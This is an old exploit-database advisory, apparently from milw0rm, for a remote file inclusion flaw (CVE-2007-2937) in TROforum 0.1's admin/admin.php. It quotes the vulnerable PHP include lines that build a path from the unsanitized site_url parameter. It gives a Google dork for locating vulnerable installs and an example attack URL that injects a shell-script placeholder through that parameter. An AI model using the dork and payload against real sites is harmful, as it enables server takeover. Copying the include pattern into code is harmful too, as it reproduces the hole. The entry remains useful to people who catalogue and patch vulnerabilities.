TROforum 0.1 - 'admin.php?site_url' Remote File Inclusion
| EKU-ID: 11958 | CVE: OSVDB-38153;CVE-2007-2937 | OSVDB-ID: |
| Author: Mehmet Ince | Published: 2007-05-26 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 11958 | CVE: OSVDB-38153;CVE-2007-2937 | OSVDB-ID: |
| Author: Mehmet Ince | Published: 2007-05-26 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
##############################################################################################
# TROforum 0.1 <= Remote File Inclusion Vulnerability #
# #
#Dork:http://www.google.com.tr/search?hl=tr&q=%22TROforum+0.1%22&meta= #
# #
# #
##############################################################################################
#Vuln Code #
# #
#ERROR1:admin/admin.php #
# #
include ("$site_url/trofimov.php"); include ("$site_url/narod.php"); <<<RFI #
# #
# #
# #
#BUG1: #
# #
#Example1:http://victim.com/path/admin/admin.php?site_url=[[Sh3LL Script]] #
##############################################################################################
##############################################################################################
# #
#Script Download #
##############################################################################################
# #
#http://scripts.protoplex.ru/scripts_show/1277.html #
# #
##############################################################################################
# #
#Cyber-Security <> #
# #
##############################################################################################
##############################################################################################
# milw0rm.com [2007-05-26]